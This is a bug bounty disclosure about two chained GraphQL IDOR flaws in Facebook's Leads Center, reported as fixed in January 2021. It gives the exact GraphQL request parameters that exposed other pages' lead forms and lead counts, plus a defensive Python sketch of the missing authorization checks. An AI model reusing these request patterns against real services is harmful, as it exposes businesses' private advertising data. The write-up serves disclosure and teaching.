Disclose leads form details of any Facebook Business Account or Facebook Page (Bug Bounty)

By chaining two GraphQL IDOR vulnerabilities affecting the Facebook Leads Center, a malicious user could have exposed the leads form details of any Facebook Page or Facebook Business Account.

Impact:

Advertisers spend a lot of time, energy and money optimizing their leads campaigns and running countless A/B tests in order to find the best-performing ad. By exposing the leads form details and the total number of leads captured through paid advertising, a malicious advertiser could have spied on a targeted Facebook Page or a competitor to "steal" and copy all the winning/profitable lead ads without investing a single dollar in advertising.

Description of Facebook Lead Ads

“Lots of people want to hear from your business, but filling in forms can be difficult on mobile. Facebook lead ads makes the lead generation process easy. People can simply tap your ad and a form pops up — it’s already pre-populated with their Facebook contact information and ready to be sent directly to you. With just a few taps, they can get the information they want, and you generate a qualified lead for your business” — Facebook.com

Steps to Reproduce:

1) First GraphQL IDOR

Send a POST request to https://www.facebook.com/api/graphql/ with required CSRF parameters and the following parameters in the request body:

&variables={"pageID":"X"}&doc_id=3388026827877743

Where X is the targeted Facebook Page ID.

The returned response will disclose the leads form details of the targeted Facebook Page.

2) Second GraphQL IDOR

Send a POST request to https://www.facebook.com/api/graphql/ with required CSRF parameters and the following additional parameters in the request body:

&variables={"pageID":"X","start_time":null,"end_time":null,"reminder_start_time":1610481600,"reminder_end_time":1610568000,"stage_id":null,"owner_id":null,"form_id":"X","label_id":null,"name_search_term":null,"answer_search_term":null,"email_search_term":null,"notes_search_term":null,"phone_search_term":null,"adgroup_id":null,"campaign_id":null,"campaign_group_id":null,"pageSize":20,"expiring_type":null,"is_unread":false}&doc_id=3547538925278909

Where X (pageID) is the Facebook Page ID and form_id is the targeted leads form ID leaked by the first GraphQL IDOR vulnerability.

The returned response will display the total number of leads captured through paid advertising by the targeted Facebook Page.
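As an added example (not from the original report and not Facebook's code), the following Python sketch shows the object-level authorization check whose absence both steps above rely on: a constructed page/form model in which the leads-form resolver verifies that the viewer holds a role on the requested pageID, and the leads-count resolver additionally verifies that the client-supplied form_id actually belongs to that page. All names, IDs and counts are assumptions.

```python
# Constructed sample data (assumption, not Facebook's real data model):
# which users hold a role on which page, each page's lead forms, and lead counts.
PAGE_ROLES = {"page-A": {"user-1"}, "page-B": {"user-2"}}
LEAD_FORMS = {
    "page-A": {"form-A1": {"name": "Spring promo", "fields": ["email", "phone"]}},
    "page-B": {"form-B1": {"name": "Webinar signup", "fields": ["email"]}},
}
LEAD_COUNTS = {"form-A1": 1240, "form-B1": 87}


class Forbidden(Exception):
    """Raised when the viewer is not authorized for the requested object."""


def _require_page_role(viewer, page_id):
    # Object-level check: the viewer must hold a role on the page named in the
    # request. Being logged in is not enough; the pageID is attacker-controlled.
    if viewer not in PAGE_ROLES.get(page_id, set()):
        raise Forbidden(f"{viewer} has no role on {page_id}")


def vulnerable_lead_forms(viewer, page_id):
    # Mirrors the first IDOR: trusts the client-supplied pageID and returns
    # the forms of whatever page was named, for any authenticated viewer.
    return LEAD_FORMS.get(page_id, {})


def lead_forms(viewer, page_id):
    # Hardened resolver for the first request (pageID only).
    _require_page_role(viewer, page_id)
    return LEAD_FORMS.get(page_id, {})


def lead_count(viewer, page_id, form_id):
    # Hardened resolver for the second request (pageID + form_id). Both IDs come
    # from the client, so check the page role AND that form_id belongs to that
    # page; otherwise a form ID obtained elsewhere could be paired with a page
    # the viewer does control to read another page's lead count.
    _require_page_role(viewer, page_id)
    if form_id not in LEAD_FORMS.get(page_id, {}):
        raise Forbidden(f"{form_id} does not belong to {page_id}")
    return LEAD_COUNTS[form_id]


def is_denied(resolver, *args):
    # Helper so callers can express "this request must be refused".
    try:
        resolver(*args)
    except Forbidden:
        return True
    return False
```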

Timeline

January 5, 2021: Report Sent
January 6, 2021: Acknowledged by Facebook
January 13, 2021: Fixed by Facebook
January 13, 2021: I added a new vulnerable GraphQL request to the report
January 15, 2021: Fixed by Facebook
January 15, 2021: I added another vulnerable GraphQL request to the report
January 21, 2021: Fixed by Facebook
February 1, 2021: Bounty awarded

Twitter: https://twitter.com/amineaboud

Entrepreneur & cyber security enthusiast doing bug bounty for fun.